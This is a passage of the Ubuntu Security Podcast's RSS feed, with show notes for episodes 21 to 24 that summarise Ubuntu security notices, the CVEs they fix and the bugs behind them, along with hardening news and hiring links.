<li>1 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9200">CVE-2019-9200</a></li>
</ul>
</li>
<li>Heap-based buffer underwrite (index into array using negative index) -
write into heap memory which preceeds the intended buffer - heap
corruption - crash -&gt; DoS, possible code execution</li>
<li>Found by fuzzing and AddressSanitizer in clang</li>
</ul>
<h3 id="usn-3906-1-libtiff-vulnerabilities">[<a href="https://usn.ubuntu.com/3906-1/">USN-3906-1</a>] LibTIFF vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7663">CVE-2019-7663</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6128">CVE-2019-6128</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19210">CVE-2018-19210</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17000">CVE-2018-17000</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12900">CVE-2018-12900</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10779">CVE-2018-10779</a></li>
</ul>
</li>
<li>All DoS, one possible code-execution:
<ul>
<li>Dereference of an invalid address (read from invalid memory location)</li>
<li>Heap buffer overread</li>
<li>2x NULL pointer dereferences</li>
<li>Memory leak</li>
<li>Heap buffer overflow - possible code execution</li>
</ul>
</li>
</ul>
<h3 id="usn-3907-1-walinuxagent-vulnerability">[<a href="https://usn.ubuntu.com/3907-1/">USN-3907-1</a>] WALinuxAgent vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-0804">CVE-2019-0804</a></li>
</ul>
</li>
<li>WALinuxAgent used to manage instances of Ubuntu (and other Linux
distributions) running on Azure</li>
<li>Can be used to configure swap space for a given image
<ul>
<li>would then create a swap file (/mnt/swapfile) BUT would make it world-readable</li>
<li>so any local user could read it - if keys or other sensitive items
were in memory that got swapped to disk could be read by all</li>
</ul>
</li>
<li>Fixed to make this readable only by root and to also correct the
permissions on any existing swapfile as well</li>
</ul>
<h3 id="usn-3902-2-php-vulnerabilities">[<a href="https://usn.ubuntu.com/3902-2/">USN-3902-2</a>] PHP vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9023">CVE-2019-9023</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9021">CVE-2019-9021</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9024">CVE-2019-9024</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9020">CVE-2019-9020</a></li>
</ul>
</li>
<li>See last week&rsquo;s <a href="https://ubuntusecuritypodcast.org/episode-23/">Episode 23</a> - discussed for Xenial and Trusty - fixed
now for Precise ESM as well</li>
</ul>
<h3 id="usn-3910-1-usn-3910-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3910-1/">USN-3910-1</a>, <a href="https://usn.ubuntu.com/3910-2/">USN-3910-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Xenial and Trusty (Xenial HWE)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6133">CVE-2019-6133</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-7740">CVE-2018-7740</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19985">CVE-2018-19985</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1120">CVE-2018-1120</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18241">CVE-2017-18241</a></li>
</ul>
</li>
<li>2 of these discussed in previous episodes <a href="https://ubuntusecuritypodcast.org/episode-23/">Episode 23</a> (PolicyKit start
time, DoS via mmaping a FUSE-backed file into processes memory
containing command-line args)</li>
<li>Trigger of BUG_ON() in kernel (like assert() for kernel code) due to
integer overflow from large pgoff parameter to remap_file_pages() when
used in conjuction with an existing mmap() -&gt; crash -&gt; DoS</li>
<li>OOB read in USB driver for Option High Speed mobile devices - would
read a descriptor from the USB device as a u8 and then index into an
array with this without checking whether it fell within the array</li>
<li>NULL pointer dereference in f2fs driver via use of noflush_merge mount
option</li>
</ul>
<h3 id="usn-3908-1-usn-3908-2-linux-kernel-vulnerability">[<a href="https://usn.ubuntu.com/3908-1/">USN-3908-1</a>, <a href="https://usn.ubuntu.com/3908-2/">USN-3908-2</a>] Linux kernel vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty and Precise ESM (Trusty HWE)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6133">CVE-2019-6133</a></li>
</ul>
</li>
<li>See last week&rsquo;s <a href="https://ubuntusecuritypodcast.org/episode-23/">Episode 23</a> - discussed for Bionic kernel - now for
Trusty kernel (and the Trusty HWE kernel backported to Precise ESM)
<ul>
<li>PolicyKit start time issue, fixed in kernel</li>
</ul>
</li>
</ul>
<h3 id="usn-3909-1-libvirt-vulnerability">[<a href="https://usn.ubuntu.com/3909-1/">USN-3909-1</a>] libvirt vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3840">CVE-2019-3840</a></li>
</ul>
</li>
<li>NULL pointer dereference in libvirt if agent does not reply in time
(say guest is being shutdown) - crash host libvirt -&gt; DoS</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-hardening-response">Ubuntu Hardening Response</h3>
<ul>
<li>Alexander Popov
<ul>
<li><a href="https://lwn.net/Articles/764325/">Responsible for getting STACKLEAK into the mainline kernel</a></li>
<li>Pointed out his <a href="https://github.com/a13xp0p0v/linux-kernel-defence-map">Linux Kernel Defence Map</a> and <a href="https://github.com/a13xp0p0v/kconfig-hardened-check">kconfig hardened check</a></li>
<li>We use kconfig hardened check internall and tyhicks has contributed
<a href="https://github.com/a13xp0p0v/kconfig-hardened-check/pull/9">various</a> <a href="https://github.com/a13xp0p0v/kconfig-hardened-check/pull/10">improvements</a> which allow this to be used to check the
various Ubuntu kernel configurations</li>
</ul>
</li>
</ul>
<h3 id="extended-security-maintenance-for-ubuntu-14-dot-04--trusty-tahr--begins-april-25-2019">Extended Security Maintenance for Ubuntu 14.04 (Trusty Tahr) begins April 25 2019</h3>
<ul>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-March/004800.html">https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-March/004800.html</a></li>
<li>Ubuntu 14.04 LTS will transition to Extended Security Maintenance on Tuesday 25th April</li>
<li>Encourage users to upgrade to Xenial (and then Bionic)</li>
<li><a href="https://blog.ubuntu.com/2019/02/05/ubuntu-14-04-trusty-tahr">ESM for 14.04 provided to customers via Ubuntu Advantage</a></li>
<li><a href="https://www.ubuntu.com/esm">Further details regarding ESM</a></li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-generalist">Ubuntu Security Generalist</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1548812">https://boards.greenhouse.io/canonical/jobs/1548812</a></li>
</ul>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E024.mp3" length="12816012" type="audio/mpeg" /><itunes:duration>13:20</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 23
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-23/</link>
          <pubDate>Tue, 12 Mar 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E023.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 23</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at security updates for the Linux kernel, PHP and NVIDIA drivers, revealing recent research into GPU based side-channel attacks plus we call for suggestions on hardening features and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at security updates for the Linux kernel, PHP and NVIDIA drivers, revealing recent research into GPU based side-channel attacks plus we call for suggestions on hardening features and more.</itunes:summary>
        <description>This week we look at security updates for the Linux kernel, PHP and NVIDIA drivers, revealing recent research into GPU based side-channel attacks plus we call for suggestions on hardening features and more.</description>
        <googleplay:description>This week we look at security updates for the Linux kernel, PHP and NVIDIA drivers, revealing recent research into GPU based side-channel attacks plus we call for suggestions on hardening features and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at security updates for the Linux kernel, PHP and NVIDIA drivers, revealing recent research into GPU based side-channel attacks plus we call for suggestions on hardening features and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>10 unique CVEs addressed</p>
<h3 id="usn-3885-2-openssh-vulnerability">[<a href="https://usn.ubuntu.com/3885-2/">USN-3885-2</a>] OpenSSH vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6111">CVE-2019-6111</a></li>
</ul>
</li>
<li>Originally covered in <a href="https://ubuntusecuritypodcast.org/episode-20">Episode 20</a> (malicious server could overwrite local client files)</li>
<li>Previous fix was incomplete - missing a patch</li>
</ul>
<h3 id="usn-3901-1-usn-3901-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3901-1/">USN-3901-1</a>, <a href="https://usn.ubuntu.com/3901-2/">USN-3901-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Bionic, Trusty &amp; Xenial (Bionic HWE kernel)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6133">CVE-2019-6133</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19854">CVE-2018-19854</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18397">CVE-2018-18397</a></li>
</ul>
</li>
<li>2 out of 3 from Jann Horn
<ul>
<li>
<p>PolicyKit provides ability to authorise an application to perform privileged actions</p>
</li>
<li>
<p>Pops up dialog for use to authorise via password - PolicyKit then caches that authorisation (5mins)</p>
</li>
<li>
<p>To identify same process in future, would look at both the PID and process start time to guard against PID reuse etc</p>
</li>
<li>
<p>However, fork() system call is not atomic, so attacked could call sys_clone() at same time as real process so it has the same start time. Can then cause kernel to block on returning back to the attacker process, effectively racing against the real process waiting for it to end, in the meantime blocking PID allocation until it has cycled around and end up with the same (reused) PID as the original authorised process (and with same start time) - so can effectively fool PolicyKit into impersonating the real process</p>
</li>
<li>
<p>Fix kernel to make fork() atomic rather than try fix PolicyKit since can&rsquo;t effectively do this at the process level</p>
</li>
<li>
<p>Kernel fixed to record process start time later in procedure so is much closer to when the process is visible to userspace and after userspace has a chance to delay it to mitigate this</p>
</li>
<li>
<p>Jann also discovered that userfaultfd does not properly handle access control for certain ioctl() - which allowed local users to write data into holes in a tmpfs file, even if the user only had read-only access to the file</p>
</li>
</ul>
</li>
<li>crypto subsystem would leak uninitialized stack memory to userspace
<ul>
<li>Occurred from a recent change to convert strncpy() to strlcpy() used to copy strings into various crypto buffers</li>
<li>strncpy() does not guarantee NULL termination so strlcpy() was used which does - HOWEVER, strncpy() would NULL pad out remaining bytes if buffer was longer than string - whereas strlcpy() would only NULL the first one - and so would have uninitialised bytes remaining</li>
<li>Fixed by changing back to strncpy()</li>
</ul>
</li>
</ul>
<h3 id="usn-3903-1-usn-3903-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3903-1/">USN-3903-1</a>, USN-3903-2] Linux kernel vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Cosmic &amp; Bionic (Cosmic HWE kernel)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6133">CVE-2019-6133</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18397">CVE-2018-18397</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16880">CVE-2018-16880</a></li>
</ul>
</li>
<li>fork() start time and userfaultfd issues described earlier for the Bionic kernel update</li>
<li>Out of bounds write in vhost_net driver used by virtualized guests - allows guest to corrupt host kernel memory -&gt; host crash -&gt; DoS, or possible arbitrary code execution in host kernel</li>
</ul>
<h3 id="usn-3902-1-php-vulnerabilities">[<a href="https://usn.ubuntu.com/3902-1/">USN-3902-1</a>] PHP vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Trusty, Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9023">CVE-2019-9023</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9022">CVE-2019-9022</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9021">CVE-2019-9021</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9024">CVE-2019-9024</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9020">CVE-2019-9020</a></li>
</ul>
</li>
<li>All allow a remote attacker to crash PHP -&gt; DoS</li>
<li>2 in XML-RPC module - remote procedure call via XML - used for various wiki backends etc - heap OOB read / UAF</li>
<li>1 in PHAR (PHP Archive) module - incorrect handling of filenames - crash via upload of crafted PHAR archive due to a heap based buffer over-read</li>
<li>1 in DNS handling (only affects PHP in Xenial) - remote attacker who can control returned DNS response could crash PHP due to buffer over-read on memcpy()</li>
<li>1 in mbstring regular expression - multiple heap based buffer over-reads in handling of multibyte sequences in regular expressions</li>
</ul>
<h3 id="usn-3904-1-nvidia-graphics-drivers-vulnerability">[<a href="https://usn.ubuntu.com/3904-1/">USN-3904-1</a>] NVIDIA graphics drivers vulnerability</h3>
<ul>
<li>1 CVE addressed in Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-6260">CVE-2018-6260</a></li>
</ul>
</li>
<li>Recent research into GPU side-channel attacks
<ul>
<li><a href="https://www.cs.ucr.edu/~zhiyunq/pub/ccs18_gpu_side_channel.pdf">Rendered Insecure: GPU Side Channel A!acks are Practical</a></li>
</ul>
</li>
<li>Local users could access GPU performance counters without special privileges</li>
<li>Allows to characterise the GPU workload to fingerprint websites etc being rendered</li>
<li>Now requires administrator privileges to access so unable to be done from a regular user</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-hardening-guide">Ubuntu Hardening Guide</h3>
<ul>
<li>Ubuntu tries to offer a usable, hardened approach out of the box
<ul>
<li>No open ports, various kernel and compiler hardening options etc</li>
</ul>
</li>
<li>Thinking about publishing a hardening guide that goes beyond the defaults</li>
<li>Welcome suggestions from the community</li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-generalist">Ubuntu Security Generalist</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1548812">https://boards.greenhouse.io/canonical/jobs/1548812</a></li>
</ul>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E023.mp3" length="12641723" type="audio/mpeg" /><itunes:duration>13:10</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 22
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-22/</link>
          <pubDate>Mon, 04 Mar 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E022.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 22</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we cover security updates including Firefox, Thunderbird, OpenSSL and another Ghostscript regression, plus we look at a recent report from Capsule8 comparing Linux hardening features across various distributions and we answer some...
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we cover security updates including Firefox, Thunderbird, OpenSSL and another Ghostscript regression, plus we look at a recent report from Capsule8 comparing Linux hardening features across various distributions and we answer some listener questions.</itunes:summary>
        <description>This week we cover security updates including Firefox, Thunderbird, OpenSSL and another Ghostscript regression, plus we look at a recent report from Capsule8 comparing Linux hardening features across various distributions and we answer some listener questions.</description>
        <googleplay:description>This week we cover security updates including Firefox, Thunderbird, OpenSSL and another Ghostscript regression, plus we look at a recent report from Capsule8 comparing Linux hardening features across various distributions and we answer some listener questions.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we cover security updates including Firefox, Thunderbird, OpenSSL and another Ghostscript regression, plus we look at a recent report from Capsule8 comparing Linux hardening features across various distributions and we answer some listener questions.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>16 unique CVEs addressed</p>
<h3 id="usn-3893-2-bind-vulnerabilities">[<a href="https://usn.ubuntu.com/3893-2/">USN-3893-2</a>] Bind vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6465">CVE-2019-6465</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5745">CVE-2018-5745</a></li>
</ul>
</li>
<li>Covered last week in <a href="https://ubuntusecuritypodcast.org/episode-21/">Episode 21</a> for regular Ubuntu releases</li>
</ul>
<h3 id="usn-3866-3-ghostscript-regression">[<a href="https://usn.ubuntu.com/3866-3/">USN-3866-3</a>] Ghostscript regression</h3>
<ul>
<li>Affecting Trusty, Xenial, Bionic, Cosmic</li>
<li>Mentioned last week briefly</li>
<li>Previous update to Ghostscript introduced a regression (blue background)
<ul>
<li>See later for information</li>
</ul>
</li>
</ul>
<h3 id="usn-3894-1-gnome-keyring-vulnerability">[<a href="https://usn.ubuntu.com/3894-1/">USN-3894-1</a>] GNOME Keyring vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-20781">CVE-2018-20781</a></li>
</ul>
</li>
<li>Already fixed upstream (hence doesn&rsquo;t apply to Bionic / Cosmic etc)</li>
<li>User&rsquo;s login password kept in memory of child process after pam session is opened</li>
<li>Could be dumped by root user or captured in crash dump etc and possibly exposed
<ul>
<li>Other tools exist to try and extract from memory as well (<a href="https://github.com/huntergregal/mimipenguin">minipenguin</a> etc)</li>
</ul>
</li>
<li>Fix is to simply reset this after pam session is opened</li>
</ul>
<h3 id="usn-3895-1-ldb-vulnerability">[<a href="https://usn.ubuntu.com/3895-1/">USN-3895-1</a>] LDB vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3824">CVE-2019-3824</a></li>
</ul>
</li>
<li>LDAP-like embedded database (used by Samba and others)</li>
<li>Authenticated user can cause OOB read when searching LDAP backend of AD DC with a search string containing multiple wildcards - crash -&gt; DoS</li>
</ul>
<h3 id="usn-3896-1-firefox-vulnerabilities">[<a href="https://usn.ubuntu.com/3896-1/">USN-3896-1</a>] Firefox vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-5785">CVE-2019-5785</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18511">CVE-2018-18511</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18356">CVE-2018-18356</a></li>
</ul>
</li>
<li>Firefox 65</li>
<li>Use-after-free and integer overflow in Skia library (vector graphics library, similar to cairo)</li>
<li>Cross-origin image theft - able to read from canvas element in violation of same-origin policy using transferFromImageBitmap() method</li>
</ul>
<h3 id="usn-3897-1-thunderbird-vulnerabilities">[<a href="https://usn.ubuntu.com/3897-1/">USN-3897-1</a>] Thunderbird vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18509">CVE-2018-18509</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18505">CVE-2018-18505</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18501">CVE-2018-18501</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-5785">CVE-2019-5785</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18500">CVE-2018-18500</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18356">CVE-2018-18356</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-5824">CVE-2016-5824</a></li>
</ul>
</li>
<li>Thunderbird 60.5.1</li>
<li>Use-after-free and integer overflow in Skia library (vector graphics library, similar to cairo)</li>
<li>Show messages with an invalid (reused) S/MIME signature as being verified</li>
<li>UAF parsing HTML5 stream with custom HTML elements</li>
<li>UAF in embedded libical via a crafted ICS file</li>
</ul>
<h3 id="usn-3898-1-usn-3898-2-nss-vulnerability">[<a href="https://usn.ubuntu.com/3898-1/">USN-3898-1</a>, USN-3898-2] NSS vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18508">CVE-2018-18508</a></li>
</ul>
</li>
<li>Several NULL pointer dereferences -&gt; crash -&gt; DoS</li>
</ul>
<h3 id="usn-3899-1-openssl-vulnerability">[<a href="https://usn.ubuntu.com/3899-1/">USN-3899-1</a>] OpenSSL vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-1559">CVE-2019-1559</a></li>
</ul>
</li>
<li>Possible padding oracle (an application which uses OpenSSL could behave differently based on whether a record contained valid padding or not)
<ul>
<li>Attacker can learn plaintext by modifying ciphertext and observing different behaviour</li>
</ul>
</li>
</ul>
<h3 id="usn-3900-1-gd-vulnerabilities">[<a href="https://usn.ubuntu.com/3900-1/">USN-3900-1</a>] GD vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6978">CVE-2019-6978</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6977">CVE-2019-6977</a></li>
</ul>
</li>
<li>Double free if failed to properly extract image file - crash -&gt; DoS</li>
<li>Heap-based buffer overflow in color matching (able to be triggered by a specially crafted image) - crash -&gt; DoS, possible code execution</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="comparison-of-linux-hardening-across-distributions">Comparison of Linux Hardening across distributions</h3>
<ul>
<li><a href="https://capsule8.com/blog/millions-of-binaries-later-a-look-into-linux-hardening-in-the-wild/">https://capsule8.com/blog/millions-of-binaries-later-a-look-into-linux-hardening-in-the-wild/</a></li>
<li>Analyses binaries from various Linux distributions looking for hardening features (OpenSUSE, Debian, CentOS, RHEL &amp; Ubuntu)</li>
<li>Compare kernel configuration vs KSPP recommendations</li>
<li>Ubuntu 18.04 ranks highest, due to proactive hardening features baked into toolchain and newer kernel taking advantage of KSPP upstream features
<ul>
<li>gcc is patched so anyone building on Ubuntu gets these features</li>
<li>build.snapcraft.io too</li>
<li>however is missing stack clash mitigation</li>
</ul>
</li>
<li>Plan to add more hardening features for 19.10 (stack clash and control-flow integrity support via gcc) and review kernel options cf. KSPP</li>
</ul>
<h3 id="q-and-a">Q&amp;A</h3>
<h4 id="does-numerous-bugs-and-regressions-in-ghostscript-indicate-it-is-reaching-it-s-eol">Does numerous bugs and regressions in Ghostscript indicate it is reaching it&rsquo;s EOL?</h4>
<ul>
<li><a href="https://twitter.com/docEbrown1/status/1101452172196163585">doc-E-brown via twitter</a></li>
<li>Lots of recent focus -&gt; finds bugs</li>
<li>ghostscript codebase is old and gnarly and some fixes have been quite invasive</li>
<li>Any new code could introduce new bugs - particularly complicated fixes -&gt; creates more bugs (regressions)
<ul>
<li>(as doc-E-brown suggests, regressions indicate old code-base)</li>
</ul>
</li>
<li>Tavis (and others) seem to be looking elsewhere but likely still more bugs to be found</li>
<li>Would be great if GS could either be made safer or a safer alternative but no-one is stepping up</li>
<li>Sadly No good viable alternative currently</li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-generalist">Ubuntu Security Generalist</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1548812">https://boards.greenhouse.io/canonical/jobs/1548812</a></li>
</ul>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h4 id="security-automation-engineer">Security Automation Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1548632">https://boards.greenhouse.io/canonical/jobs/1548632</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E022.mp3" length="15316244" type="audio/mpeg" /><itunes:duration>15:57</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 21
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-21/</link>
          <pubDate>Thu, 21 Feb 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E021.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 21</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        Double episode covering the security updates from the last 2 weeks, including snapd (DirtySock), systemd and more, plus we talk responsible disclosure and some open positions on the Ubuntu Security team.
        
        ]]></itunes:subtitle>
        <itunes:summary>Double episode covering the security updates from the last 2 weeks, including snapd (DirtySock), systemd and more, plus we talk responsible disclosure and some open positions on the Ubuntu Security team.</itunes:summary>
        <description>Double episode covering the security updates from the last 2 weeks, including snapd (DirtySock), systemd and more, plus we talk responsible disclosure and some open positions on the Ubuntu Security team.</description>
        <googleplay:description>Double episode covering the security updates from the last 2 weeks, including snapd (DirtySock), systemd and more, plus we talk responsible disclosure and some open positions on the Ubuntu Security team.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Double episode covering the security updates from the last 2 weeks, including snapd (DirtySock), systemd and more, plus we talk responsible disclosure and some open positions on the Ubuntu Security team.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>15 unique CVEs addressed</p>
<h3 id="usn-3886-1-poppler-vulnerabilities">[<a href="https://usn.ubuntu.com/3886-1/">USN-3886-1</a>] poppler vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7310">CVE-2019-7310</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20551">CVE-2018-20551</a></li>
</ul>
</li>
<li>Two DoS:
<ul>
<li>Out-of-bounds heap buffer read due to missing check for a negative index -&gt; crash -&gt; DoS</li>
<li>Crash due to hitting an assertion -&gt; DoS</li>
</ul>
</li>
</ul>
<h3 id="usn-3888-1-gvfs-vulnerability">[<a href="https://usn.ubuntu.com/3888-1/">USN-3888-1</a>] GVfs vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3827">CVE-2019-3827</a></li>
</ul>
</li>
<li>Possible to allow a local user with admin privileges (eg. sudo group) to read arbitrary files without prompting for authorisation IF no policykit agents running
<ul>
<li>Policykit agents run by default so would require user to be running a difffent DE or to have uninstalled / disabled them</li>
<li>Also low impact since user has authority anyway</li>
</ul>
</li>
</ul>
<h3 id="usn-3889-1-webkitgtk-plus-vulnerabilities">[<a href="https://usn.ubuntu.com/3889-1/">USN-3889-1</a>] WebKitGTK+ vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6215">CVE-2019-6215</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6212">CVE-2019-6212</a></li>
